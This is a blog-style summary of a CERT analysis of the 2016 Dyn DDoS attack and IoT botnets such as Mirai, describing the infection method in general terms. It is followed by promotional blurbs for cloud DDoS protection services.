IoT Botnet and DDoS Attacks Analysis from CERT
The Computer Emergency Response Team (CERT) initiated an advanced analysis process to follow up and analyze the DDoS attack in response of the attack took on Oct 21, 2016 to the DNS service provider Dyn. According to the CERT analysis, this incident involved multiple factors particularly IoT device security vulnerabilities. In addition to the DDoS attack and DNS security on the surface, there were still many other issues that are worth greater attention and further research.
Dyn said that this DDoS attack involved tens of millions IP addresses, most of which were IoT and smart devices. Dyn believed that the attack came from a malicious code named “Mirai.” Hacker organizations NewWorldHackers and Anonymous claimed responsibility for the attack .
The scale of botnets that rely on IoT devices is continuously increasing. Typical IoT DDoS botnet families include the CCTV series that appeared in 2013, ChiekenMM series (including 10771, 10991, 25000, and 36000), and Linux-based cross-platform DDoS botnet families (such as BillGates, Mayday, PNScan, and Gafgyt).
In DDoS attacks (including Mirai) targeted at IoT devices, attackers perform brute-force cracking on popular password files through the Telnet port, or log on using the default password. If attackers successfully log on through Telnet, they attempt to use the necessary embedded tools like BusyBox and wget to download the bot of the DDoS function, modify executable attributes, and run and control IoT devices. Due to the difference of the CPU command architectures, after determining the system architecture, some botnets can select samples of the MIPS, arm, or x86 architectures for downloading. After running these samples, botnets receive related attacks commands to initiate attacks.
Undoubtedly, the DNS is an information infrastructure, but the IoT botnet is not merely a tool for initiating this attack. IoT is an Internet of Things, and also an essential supporting node in the future information society. IoT is a network extended and expanded based on the Internet. It is not merely a network. IoT can use the embedded sensors, devices, and systems that adopt the awareness and information sensing technologies to build complex applications that involve the physical, social space.
Related Blog Posts
On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.
In the morning of the attack, Dyn confirmed that its DNS infrastructure located in the East Coast had suffered DDoS attacks from all over the world. The attacks severely affected the business of Dyn’s DNS customers, and even worse, websites of customers became inaccessible. These attacks lasted until 13:45 PM ET. Dyn said on its official website that it would track down this issue and release the incident report.
This article discusses the importance of IoT device security by looking at CERT’s interpretation of the infamous 2016 DDoS attack.
Alibaba Cloud Elastic Compute Service (ECS) provides a faster and more powerful way to run your cloud applications as compared with traditional physical servers. You can achieve great results on your cloud needs. With ECS, you can achieve more with the latest generation of CPUs as well as protect your instance from DDoS and Trojan attacks.
In this tutorial, we will talk about the best practices for provisioning your Ubuntu 16.04 server hosted on an Alibaba Cloud Elastic Compute Service (ECS) instance.
Managed Security Service (MSS) is available in Alibaba Cloud Security DDoS Protection. Once you activate the MSS of DDoS Protection service, you can get professional and exclusive technical support from Alibaba Cloud Security experts with regard to implementing and using Alibaba Cloud DDoS Protection.
Anti-Bot Service (Anti-Bot) is fully compatible with Anti-DDoS Pro. You can deploy both Anti-Bot and Anti-DDoS Pro for your origin server in this schema: Anti-DDoS Pro (ingress to DDoS protection) > Anti-Bot (intermediate layer for application-layer protection) > origin server.
Alibaba Cloud Managed Security Service is a security technology and consulting service designed to establish, and optimize, security protection systems so that users can ensure the security of their business on the cloud. Built from years of security experience, Alibaba Cloud Managed Security Service applies best practices that have been developed by leading security experts to greatly benefit cloud service users.
Anti-DDoS Pro is a value-added service used to protect servers, including external servers hosted in Mainland China, against volumetric DDoS attacks. You can redirect attack traffic to Anti-DDoS Pro to ensure the stability and availability of origin sites.